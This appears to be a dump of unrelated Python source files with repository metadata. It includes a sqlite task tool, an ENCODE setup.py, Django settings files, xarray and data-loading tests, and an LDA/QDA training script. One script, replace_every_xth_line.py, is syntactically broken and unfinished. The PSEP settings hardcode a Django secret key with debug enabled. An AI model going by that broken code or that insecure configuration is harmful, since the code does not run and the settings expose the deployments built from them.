_many_refs = []
| mit | -6,638,819,848,225,770,000 | 42.766871 | 448 | 0.614943 | false |
nathanielksmith/done | done/Tasks.py | 1 | 2607 | # who nate smith
# when march 2010
# why the done tool
# where midwest usa
import sys
from time import mktime, time
from datetime import datetime
import sqlite3
from termcolor import colored
import sql_interp.sql_interp as si
from Config import db_path
class Task:
def __init__(self, desc, due):
self.desc = desc
self.si = si.SQLInterp()
self.db = sqlite3.connect(db_path)
self.c = self.db.cursor()
self.due = datetime.fromtimestamp(due) if due else None
def add(self):
insert = {
"desc" : self.desc,
"created" : time()
}
if self.due:
insert["due"] = mktime(self.due.timetuple())
interped = self.si.interp("INSERT INTO tasks", insert)
self.c.execute(interped[0], interped[1])
self.db.commit()
print "\t *", self
def done(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[dN]:")
if answer == "d":
self.finish()
return True
return False
def remove(self):
sys.stdout.write("\t * " + str(self) + "? ")
answer = raw_input("[rmN]:")
if answer == "rm":
self.delete()
return True
return False
def finish(self):
where = { "desc":self.desc }
interped = self.si.interp("UPDATE tasks SET done=1 WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def delete(self):
where = { "desc":self.desc }
interped = self.si.interp("DELETE FROM tasks WHERE", where)
self.c.execute(interped[0], interped[1])
self.db.commit()
def pretty_due(self):
if not self.due:
return ""
due_string = self.due.strftime("%a, %Y-%m-%d %X")
overdue = lambda s: colored(s, "white", "on_red")
red = lambda s: colored(s, "red")
yellow = lambda s: colored(s, "yellow")
green = lambda s: colored(s, "green")
now = datetime.now()
delta = self.due - now
if delta.days < 0: # overdue
due_string = overdue(due_string)
if delta.days == 0:
due_string = red(due_string)
if delta.days == 1:
due_string = yellow(due_string)
if delta.days > 1:
due_string = green(due_string)
return due_string
def __str__(self):
due_string = self.pretty_due()
return "%s %s" % (self.desc, due_string)
| gpl-3.0 | -1,143,508,511,663,373,800 | 23.59434 | 73 | 0.519371 | false |
T2DREAM/t2dream-portal | setup.py | 1 | 3286 | import os
import sys
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.md')).read()
CHANGES = open(os.path.join(here, 'CHANGES.rst')).read()
requires = [
'snovault',
'Pillow',
'PyBrowserID',
'SQLAlchemy>=1.0.0b1',
'WSGIProxy2',
'WebTest',
'boto',
'botocore',
'jmespath',
'boto3',
'elasticsearch',
'lucenequery',
'future',
'humanfriendly',
'jsonschema_serialize_fork',
'loremipsum',
'netaddr',
'passlib',
'psutil',
'pyramid',
'pyramid_localroles',
'pyramid_multiauth',
'pyramid_tm',
'python-magic',
'pytz',
'rdflib',
'rdflib-jsonld',
'rfc3987',
'setuptools',
'simplejson',
'strict_rfc3339',
'subprocess_middleware',
'xlrd',
'zope.sqlalchemy',
]
if sys.version_info.major == 2:
requires.extend([
'backports.functools_lru_cache',
'subprocess32',
])
tests_require = [
'pytest>=2.4.0',
'pytest-bdd',
'pytest-mock',
'pytest-splinter',
'pytest_exact_fixtures',
]
setup(
name='encoded',
version='66.0',
description='Metadata database for ENCODE',
long_description=README + '\n\n' + CHANGES,
packages=find_packages('src'),
package_dir={'': 'src'},
include_package_data=True,
zip_safe=False,
author='Laurence Rowe',
author_email='[email protected]',
url='http://encode-dcc.org',
license='MIT',
install_requires=requires,
tests_require=tests_require,
extras_require={
'test': tests_require,
},
entry_points='''
[console_scripts]
batchupgrade = snovault.batchupgrade:main
create-mapping = snovault.elasticsearch.create_mapping:main
dev-servers = snovault.dev_servers:main
es-index-listener = snovault.elasticsearch.es_index_listener:main
add-date-created = encoded.commands.add_date_created:main
check-rendering = encoded.commands.check_rendering:main
deploy = encoded.commands.deploy:main
extract_test_data = encoded.commands.extract_test_data:main
es-index-data = encoded.commands.es_index_data:main
generate-ontology = encoded.commands.generate_ontology:main
import-data = encoded.commands.import_data:main
jsonld-rdf = encoded.commands.jsonld_rdf:main
migrate-files-aws = encoded.commands.migrate_files_aws:main
profile = encoded.commands.profile:main
spreadsheet-to-json = encoded.commands.spreadsheet_to_json:main
generate-annotations = encoded.commands.generate_annotations:main
index-annotations = encoded.commands.index_annotations:main
migrate-attachments-aws = encoded.commands.migrate_attachments_aws:main
migrate-dataset-type = encoded.commands.migrate_dataset_type:main
[paste.app_factory]
main = encoded:main
[paste.composite_factory]
indexer = snovault.elasticsearch.es_index_listener:composite
visindexer = snovault.elasticsearch.es_index_listener:composite
regionindexer = snovault.elasticsearch.es_index_listener:composite
[paste.filter_app_factory]
memlimit = encoded.memlimit:filter_app
''',
)
| mit | 1,263,833,566,525,261,800 | 28.339286 | 79 | 0.650335 | false |
neil92/MiscScripts2 | replace_every_xth_line.py | 1 | 1281 | #!/usr/local/miniconda3/bin/python
def setupArguments():
"""
This is the function that sets up the flags and the arguements you can pass to the script.
:author: Neil A. Patel
"""
aParser = argparse.ArgumentParser("Setup the arguments.")
aparser.add_argument('-f', '--file', action='store', dest='file_target', required=true,
help="This is the file that will have every xth character replaced.")
aparser.add_argument("-o", "--output", action='store', dest='file_output', required=true,
help="This is the file that will be outputed.")
aParser.add_argument('-c', '--character', action='store', dest="target_character", required=False,
default="\n", help="This is an argument where you can specify which character you want to replace")
aParser.add_argument("-p", "--period", action="store", dest="period", required=False,
default=2, help="The inverse of frequency. You want to replace the character every xth position.")
return aParser.parse_args()
def main():
args = setupArguments()
with open(args.file_target) as file_target:
with open(args.file_output, "w") as file_output:
number_of_times_seen = 1
for line in file_target:
if number_of_times_seen = period:
if __name__ == "__main__":
main()
| mit | -5,675,658,794,333,368,000 | 39.03125 | 105 | 0.674473 | false |
bertnotbob/django-property | config/settings/base.py | 1 | 4530 | import dj_database_url, os
from django.core.exceptions import ImproperlyConfigured
def get_env_variable(var_name):
try:
return os.environ[var_name]
except:
error_msg = 'Set the {} environment variable'.format(var_name)
raise ImproperlyConfigured(error_msg)
# Paths
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Secret Key
SECRET_KEY = get_env_variable('SECRET_KEY')
# Debug
DEBUG = True
# Allowed Hosts
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'homes',
'homes_for_sale',
'homes_to_let',
'homes_user',
'homes_agent',
'homes_json',
'homes_theme_default',
'django.contrib.humanize',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'mapwidgets',
'sorl.thumbnail',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Wsgi
WSGI_APPLICATION = 'config.wsgi.application'
# Database
DATABASES = {
'default': dj_database_url.config(conn_max_age=500)
}
DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.postgis'
# Password validation
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'debug_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/debug.log') # Place outside of app location
},
'app_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': os.path.join(BASE_DIR, '../logs/app.log') # Place outside of app location
},
},
'loggers': {
'django': {
'handlers': ['debug_file'],
'level': 'DEBUG',
'propagate': True,
},
'app': {
'handlers': ['app_file'],
'level': 'DEBUG',
'propagate': True,
}
},
}
# Internationalization
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AWS
AWS_STORAGE_BUCKET_NAME = get_env_variable('AWS_STORAGE_BUCKET_NAME')
AWS_ACCESS_KEY_ID = get_env_variable('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = get_env_variable('AWS_SECRET_ACCESS_KEY')
AWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME
# Static files
STATICFILES_LOCATION = 'static'
STATICFILES_STORAGE = 'config.custom_storages.StaticStorage'
STATIC_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, STATICFILES_LOCATION)
# Media files
MEDIAFILES_LOCATION = 'media'
MEDIA_URL = "https://%s/%s/" % (AWS_S3_CUSTOM_DOMAIN, MEDIAFILES_LOCATION)
DEFAULT_FILE_STORAGE = 'config.custom_storages.MediaStorage'
# Accounts
ACCOUNT_ACTIVATION_DAYS = 7
# User settings
LOGIN_REDIRECT_URL = '/user/dashboard/'
# Google
GOOGLE_MAPS_API_KEY=get_env_variable('GOOGLE_MAPS_API_KEY')
# Email
EMAIL_HOST = get_env_variable('EMAIL_HOST')
EMAIL_HOST_USER = get_env_variable('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_env_variable('EMAIL_HOST_PASSWORD')
EMAIL_PORT = get_env_variable('EMAIL_PORT') | mit | 5,718,639,544,731,947,000 | 25.343023 | 99 | 0.641501 | false |
tombosc/dict_based_learning | tests/test_data.py | 1 | 3193 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import base64
from fuel.datasets import IndexableDataset
from fuel.streams import DataStream
from dictlearn.data import (
LanguageModellingData, ExtractiveQAData, RandomSpanScheme)
from dictlearn.vocab import Vocabulary
from dictlearn.util import vec2str
from tests.util import TEST_TEXT, TEST_SQUAD_BASE64_HDF5_DATA
def test_languge_modelling_data():
temp_dir = tempfile.mkdtemp()
train_path = os.path.join(temp_dir, "train.txt")
with open(train_path, 'w') as dst:
print(TEST_TEXT, file=dst)
data = LanguageModellingData(temp_dir, 'standard')
# test without batches
stream = data.get_stream('train')
it = stream.get_epoch_iterator()
example = next(it)
# skip one
example = next(it)
assert len(example) == 1
assert len(example[0]) == 4
assert example[0][0][:5].tolist() == map(ord, '<bos>')
assert example[0][1][:5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[0][2][:5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[0][3][:5].tolist() == [ord('x'), ord('y'), ord('z'), 0, 0]
# test with batches
stream = data.get_stream('train', batch_size=2)
it = stream.get_epoch_iterator()
example = next(it)
# skip one
example = next(it)
assert len(example) == 2
assert example[0].shape == (2, 4, 100)
assert example[1].shape == (2, 4)
assert example[0][1, 2, :5].tolist() == [ord('d'), ord('e'), ord('f'), 0, 0]
assert example[1].tolist() == [[1., 1., 0., 0.], [1., 1., 1., 1.]]
os.remove(train_path)
os.rmdir(temp_dir)
def test_squad_data():
temp_dir = tempfile.mkdtemp()
train_path = os.path.join(temp_dir, 'train.h5')
with open(train_path, 'wb') as dst:
print(base64.b64decode(TEST_SQUAD_BASE64_HDF5_DATA), file=dst)
data = ExtractiveQAData(path=temp_dir, layout='squad')
stream = data.get_stream('train', batch_size=3, shuffle=True, seed=3)
assert set(stream.sources) == set(['contexts', 'contexts_mask',
'questions', 'questions_mask',
'answer_begins',
'answer_ends'])
batch = next(stream.get_epoch_iterator(as_dict=True))
assert batch['contexts'].ndim == 2
assert batch['contexts_mask'].ndim == 2
assert batch['questions'].ndim == 2
assert batch['questions_mask'].ndim == 2
assert batch['answer_begins'].tolist() == [45, 78, 117]
assert batch['answer_ends'].tolist() == [46, 80, 118]
longest = batch['contexts_mask'].sum(axis=1).argmax()
assert batch['contexts'][longest][-1] == data.vocab.eos
def test_random_span_scheme():
scheme = RandomSpanScheme(10000, 100, 1)
req_it = scheme.get_request_iterator()
assert next(req_it) == slice(235, 335, None)
dataset = IndexableDataset(['abc', 'def', 'xyz', 'ter'])
scheme = RandomSpanScheme(4, 2, 1)
stream = DataStream(dataset, iteration_scheme=scheme)
it = stream.get_epoch_iterator()
assert next(it) == (['def', 'xyz'],)
| mit | -2,698,814,175,180,520,400 | 34.876404 | 80 | 0.613216 | false |
pydata/xarray | xarray/tests/test_utils.py | 1 | 10440 | from datetime import datetime
from typing import Hashable
import numpy as np
import pandas as pd
import pytest
from xarray.coding.cftimeindex import CFTimeIndex
from xarray.core import duck_array_ops, utils
from xarray.core.indexes import PandasIndex
from xarray.core.utils import either_dict_or_kwargs, iterate_nested
from . import assert_array_equal, requires_cftime, requires_dask
from .test_coding_times import _all_cftime_date_types
class TestAlias:
def test(self):
def new_method():
pass
old_method = utils.alias(new_method, "old_method")
assert "deprecated" in old_method.__doc__
with pytest.warns(Warning, match="deprecated"):
old_method()
def test_safe_cast_to_index():
dates = pd.date_range("2000-01-01", periods=10)
x = np.arange(5)
td = x * np.timedelta64(1, "D")
midx = pd.MultiIndex.from_tuples([(0,)], names=["a"])
for expected, array in [
(dates, dates.values),
(pd.Index(x, dtype=object), x.astype(object)),
(pd.Index(td), td),
(pd.Index(td, dtype=object), td.astype(object)),
(midx, PandasIndex(midx)),
]:
actual = utils.safe_cast_to_index(array)
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@pytest.mark.parametrize(
"a, b, expected", [["a", "b", np.array(["a", "b"])], [1, 2, pd.Index([1, 2])]]
)
def test_maybe_coerce_to_str(a, b, expected):
a = np.array([a])
b = np.array([b])
index = pd.Index(a).append(pd.Index(b))
actual = utils.maybe_coerce_to_str(index, [a, b])
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
def test_maybe_coerce_to_str_minimal_str_dtype():
a = np.array(["a", "a_long_string"])
index = pd.Index(["a"])
actual = utils.maybe_coerce_to_str(index, [a])
expected = np.array("a")
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
@requires_cftime
def test_safe_cast_to_index_cftimeindex():
date_types = _all_cftime_date_types()
for date_type in date_types.values():
dates = [date_type(1, 1, day) for day in range(1, 20)]
expected = CFTimeIndex(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert expected.dtype == actual.dtype
assert isinstance(actual, type(expected))
# Test that datetime.datetime objects are never used in a CFTimeIndex
@requires_cftime
def test_safe_cast_to_index_datetime_datetime():
dates = [datetime(1, 1, day) for day in range(1, 20)]
expected = pd.Index(dates)
actual = utils.safe_cast_to_index(np.array(dates))
assert_array_equal(expected, actual)
assert isinstance(actual, pd.Index)
def test_multiindex_from_product_levels():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 3, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 1, 2, 0, 1, 2]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 3, 2])
other = pd.MultiIndex.from_product([["b", "a"], [1, 3, 2]])
np.testing.assert_array_equal(result.values, other.values)
def test_multiindex_from_product_levels_non_unique():
result = utils.multiindex_from_product_levels(
[pd.Index(["b", "a"]), pd.Index([1, 1, 2])]
)
np.testing.assert_array_equal(
result.codes, [[0, 0, 0, 1, 1, 1], [0, 0, 1, 0, 0, 1]]
)
np.testing.assert_array_equal(result.levels[0], ["b", "a"])
np.testing.assert_array_equal(result.levels[1], [1, 2])
class TestArrayEquiv:
def test_0d(self):
# verify our work around for pd.isnull not working for 0-dimensional
# object arrays
assert duck_array_ops.array_equiv(0, np.array(0, dtype=object))
assert duck_array_ops.array_equiv(np.nan, np.array(np.nan, dtype=object))
assert not duck_array_ops.array_equiv(0, np.array(1, dtype=object))
class TestDictionaries:
@pytest.fixture(autouse=True)
def setup(self):
self.x = {"a": "A", "b": "B"}
self.y = {"c": "C", "b": "B"}
self.z = {"a": "Z"}
def test_equivalent(self):
assert utils.equivalent(0, 0)
assert utils.equivalent(np.nan, np.nan)
assert utils.equivalent(0, np.array(0.0))
assert utils.equivalent([0], np.array([0]))
assert utils.equivalent(np.array([0]), [0])
assert utils.equivalent(np.arange(3), 1.0 * np.arange(3))
assert not utils.equivalent(0, np.zeros(3))
def test_safe(self):
# should not raise exception:
utils.update_safety_check(self.x, self.y)
def test_unsafe(self):
with pytest.raises(ValueError):
utils.update_safety_check(self.x, self.z)
def test_compat_dict_intersection(self):
assert {"b": "B"} == utils.compat_dict_intersection(self.x, self.y)
assert {} == utils.compat_dict_intersection(self.x, self.z)
def test_compat_dict_union(self):
assert {"a": "A", "b": "B", "c": "C"} == utils.compat_dict_union(self.x, self.y)
with pytest.raises(
ValueError,
match=r"unsafe to merge dictionaries without "
"overriding values; conflicting key",
):
utils.compat_dict_union(self.x, self.z)
def test_dict_equiv(self):
x = {}
x["a"] = 3
x["b"] = np.array([1, 2, 3])
y = {}
y["b"] = np.array([1.0, 2.0, 3.0])
y["a"] = 3
assert utils.dict_equiv(x, y) # two nparrays are equal
y["b"] = [1, 2, 3] # np.array not the same as a list
assert utils.dict_equiv(x, y) # nparray == list
x["b"] = [1.0, 2.0, 3.0]
assert utils.dict_equiv(x, y) # list vs. list
x["c"] = None
assert not utils.dict_equiv(x, y) # new key in x
x["c"] = np.nan
y["c"] = np.nan
assert utils.dict_equiv(x, y) # as intended, nan is nan
x["c"] = np.inf
y["c"] = np.inf
assert utils.dict_equiv(x, y) # inf == inf
y = dict(y)
assert utils.dict_equiv(x, y) # different dictionary types are fine
y["b"] = 3 * np.arange(3)
assert not utils.dict_equiv(x, y) # not equal when arrays differ
def test_frozen(self):
x = utils.Frozen(self.x)
with pytest.raises(TypeError):
x["foo"] = "bar"
with pytest.raises(TypeError):
del x["a"]
with pytest.raises(AttributeError):
x.update(self.y)
assert x.mapping == self.x
assert repr(x) in (
"Frozen({'a': 'A', 'b': 'B'})",
"Frozen({'b': 'B', 'a': 'A'})",
)
def test_repr_object():
obj = utils.ReprObject("foo")
assert repr(obj) == "foo"
assert isinstance(obj, Hashable)
assert not isinstance(obj, str)
def test_repr_object_magic_methods():
o1 = utils.ReprObject("foo")
o2 = utils.ReprObject("foo")
o3 = utils.ReprObject("bar")
o4 = "foo"
assert o1 == o2
assert o1 != o3
assert o1 != o4
assert hash(o1) == hash(o2)
assert hash(o1) != hash(o3)
assert hash(o1) != hash(o4)
def test_is_remote_uri():
assert utils.is_remote_uri("http://example.com")
assert utils.is_remote_uri("https://example.com")
assert not utils.is_remote_uri(" http://example.com")
assert not utils.is_remote_uri("example.nc")
class Test_is_uniform_and_sorted:
def test_sorted_uniform(self):
assert utils.is_uniform_spaced(np.arange(5))
def test_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([-2, 1, 89])
def test_not_sorted_uniform(self):
assert not utils.is_uniform_spaced([1, -1, 3])
def test_not_sorted_not_uniform(self):
assert not utils.is_uniform_spaced([4, 1, 89])
def test_two_numbers(self):
assert utils.is_uniform_spaced([0, 1.7])
def test_relative_tolerance(self):
assert utils.is_uniform_spaced([0, 0.97, 2], rtol=0.1)
class Test_hashable:
def test_hashable(self):
for v in [False, 1, (2,), (3, 4), "four"]:
assert utils.hashable(v)
for v in [[5, 6], ["seven", "8"], {9: "ten"}]:
assert not utils.hashable(v)
@requires_dask
def test_dask_array_is_scalar():
# regression test for GH1684
import dask.array as da
y = da.arange(8, chunks=4)
assert not utils.is_scalar(y)
def test_hidden_key_dict():
hidden_key = "_hidden_key"
data = {"a": 1, "b": 2, hidden_key: 3}
data_expected = {"a": 1, "b": 2}
hkd = utils.HiddenKeyDict(data, [hidden_key])
assert len(hkd) == 2
assert hidden_key not in hkd
for k, v in data_expected.items():
assert hkd[k] == v
with pytest.raises(KeyError):
hkd[hidden_key]
with pytest.raises(KeyError):
del hkd[hidden_key]
def test_either_dict_or_kwargs():
result = either_dict_or_kwargs(dict(a=1), None, "foo")
expected = dict(a=1)
assert result == expected
result = either_dict_or_kwargs(None, dict(a=1), "foo")
expected = dict(a=1)
assert result == expected
with pytest.raises(ValueError, match=r"foo"):
result = either_dict_or_kwargs(dict(a=1), dict(a=1), "foo")
@pytest.mark.parametrize(
["supplied", "all_", "expected"],
[
(list("abc"), list("abc"), list("abc")),
(["a", ..., "c"], list("abc"), list("abc")),
(["a", ...], list("abc"), list("abc")),
(["c", ...], list("abc"), list("cab")),
([..., "b"], list("abc"), list("acb")),
([...], list("abc"), list("abc")),
],
)
def test_infix_dims(supplied, all_, expected):
result = list(utils.infix_dims(supplied, all_))
assert result == expected
@pytest.mark.parametrize(
["supplied", "all_"], [([..., ...], list("abc")), ([...], list("aac"))]
)
def test_infix_dims_errors(supplied, all_):
with pytest.raises(ValueError):
list(utils.infix_dims(supplied, all_))
@pytest.mark.parametrize(
"nested_list, expected",
[
([], []),
([1], [1]),
([1, 2, 3], [1, 2, 3]),
([[1]], [1]),
([[1, 2], [3, 4]], [1, 2, 3, 4]),
([[[1, 2, 3], [4]], [5, 6]], [1, 2, 3, 4, 5, 6]),
],
)
def test_iterate_nested(nested_list, expected):
assert list(iterate_nested(nested_list)) == expected
| apache-2.0 | 7,916,387,651,723,424,000 | 30.164179 | 88 | 0.582759 | false |
tingcar/PSEP | src/PSEP/settings.py | 1 | 3680 | """
Django settings for PSEP project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a9j_-kq$z8#r(8h4m)74l&&gspv%%e=!*(rnys6m^(c13aq%sn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#my apps
'contact',
'enbuckets',
'profiles',
'internalmail',
'events',
#tools
'south',
'registration',
'debug_toolbar',
'dajaxice',
'dajax',
)
ACCOUNT_ACTIVATION_DAYS = 7
REGISTRATION_OPEN = False
auth_password_reset = '/'
AUTH_PROFILE_MODULE = 'profiles.profile'
LOGIN_REDIRECT_URL = '/accounts/dashboard/'
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'PSEP.urls'
WSGI_APPLICATION = 'PSEP.wsgi.application'
######## DATABASE #########
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'dajaxice.finders.DajaxiceFinder',
)
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
# STATIC_URL = '/static/'
STATIC_URL = '/assets/'
MEDIA_URL='/media/'
#static
MEDIA_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','media')
STATIC_ROOT = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','static-only')
STATICFILES_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','assets'),
)
TEMPLATE_DIRS = (
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(__file__))),'static','templates'),
)
| apache-2.0 | -5,925,759,729,754,591,000 | 22.144654 | 110 | 0.701087 | false |
TakLee96/discriminant | train.py | 1 | 2430 | import numpy as np
from os import path
from scipy.io import loadmat
from timer import timer
from classifier import LDAClassifier, QDAClassifier
""" TODO: choose either mnist or spam >>HERE<< """
which = "spam.mat"
which = "mnist.mat"
""" TODO: choose either mnist or spam >>HERE<< """
timer.start("reading", which, "data from matlab file")
raw = loadmat(path.join(path.dirname(__file__), "data", which))
raw_data = raw['data']
raw_labl = raw['label'][0]
timer.end("done")
timer.start("permuting data randomly")
np.random.seed(0)
ordering = np.random.permutation(len(raw_data))
data = np.ndarray(shape=raw_data.shape, dtype=raw_data.dtype)
labl = np.ndarray(shape=raw_labl.shape, dtype=raw_labl.dtype)
for old, new in enumerate(ordering):
data[new] = raw_data[old]
labl[new] = raw_labl[old]
del raw, raw_data, raw_labl, ordering
timer.end("done")
def cross_validation(method, k=5):
if method == "lda":
Classifier = LDAClassifier
elif method == "qda":
Classifier = QDAClassifier
else:
raise Exception("lda or qda only")
timer.start("folding data into", k, "copies")
data_slice = [ None ] * k
labl_slice = [ None ] * k
train_rate = [ 0.0 ] * k
valid_rate = [ 0.0 ] * k
n = len(labl)
m = n / k
for i in range(k):
data_slice[i] = data[(i*m):min((i+1)*m,n)]
labl_slice[i] = labl[(i*m):min((i+1)*m,n)]
timer.end("done")
for j in range(k):
timer.start("validation iteration #", j)
training_data = np.concatenate(tuple(data_slice[i] for i in range(k) if i != j))
training_labl = np.concatenate(tuple(labl_slice[i] for i in range(k) if i != j))
print ".... data formating done"
c = LDAClassifier(training_data, training_labl)
print ".... classifier training done"
train_rate[j] = c.score(c.classify_all(training_data), training_labl)
print ".... training accuracy computation done"
valid_rate[j] = c.score(c.classify_all(data_slice[j]), labl_slice[j])
print ".... validation accuracy computation done"
timer.end("done; training accuracy =", train_rate[j], "; validation accuracy =", valid_rate[j])
print k, "fold cross validation for", method, "on dataset", which, "complete"
print ".... overall training accuracy =", np.mean(train_rate)
print ".... overall validation accuracy =", np.mean(valid_rate)
cross_validation("qda")
| mit | -644,527,991,301,725,700 | 33.714286 | 103 | 0.634979 | false |
marcoscrcamargo/ic | results.py | 1 | 2191 | import csv
import time
fieldnames = ['class', 'knn_hst', 'hst_pxl', 'mlp_hst', 'mlp_pxl', 'svm_hst', 'svm_pxl', 'ensemble_hst', 'ensemble_pxl', 'ensemble_all']
writer = None
file = 'results_' + str(time.ctime()) +'.csv'
def initializate(fname=file):
global writer
global file
file = fname
with open(fname, 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
def write_row(label, knn_hst, hst_pxl, mlp_hst, mlp_pxl, svm_hst, svm_pxl, ensemble_hst, ensemble_pxl, ensemble_all):
global writer
with open(file, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({ fieldnames[0]: label,
fieldnames[1]: knn_hst,
fieldnames[2]: hst_pxl,
fieldnames[3]: mlp_hst,
fieldnames[4]: mlp_pxl,
fieldnames[5]: svm_hst,
fieldnames[6]: svm_pxl,
fieldnames[7]: ensemble_hst,
fieldnames[8]: ensemble_pxl,
fieldnames[9]: ensemble_all})
def main():
initializate()
write_row('e', '1', '2', '0', '1', '2', '0', '1', '0', '2')
# write_csv = {'class':'none',
# 'knn_hst': str(knn_ret['hst']['label']) + '_' + str(knn_ret['hst'][str(knn_ret['hst']['label'])]),
# 'hst_pxl': str(knn_ret['pxl']['label']) + '_' + str(knn_ret['pxl'][str(knn_ret['pxl']['label'])]),
# 'mlp_hst': str(mlp_ret['hst']['label']) + '_' + str(mlp_ret['hst'][str(mlp_ret['hst']['label'])]),
# 'mlp_pxl': str(mlp_ret['pxl']['label']) + '_' + str(mlp_ret['pxl'][str(mlp_ret['pxl']['label'])]),
# 'svm_hst': str(svm_ret['hst']['label']) + '_' + str(svm_ret['hst'][str(svm_ret['hst']['label'])]),
# 'svm_pxl': str(svm_ret['pxl']['label']) + '_' + str(svm_ret['pxl'][str(svm_ret['pxl']['label'])]),
# 'ensemble_hst': str(hst_c['label']) + '_' + str(hst_c[str(hst_c['label'])]),
# 'ensemble_pxl': str(pxl_c['label']) + '_' + str(pxl_c[str(pxl_c['label'])]),
# 'ensemble_all': str(all_c['label']) + '_' + str(all_c[str(all_c['label'])])}
if __name__ == "__main__":
main() | gpl-3.0 | 6,560,752,996,770,302,000 | 41.980392 | 136 | 0.524418 | false |
lisogallo/odoo-it-infra | it_infrastructure/server_repository.py | 1 | 2915 | # -*- coding: utf-8 -*-
from openerp import models, fields, api, _
from openerp.exceptions import except_orm
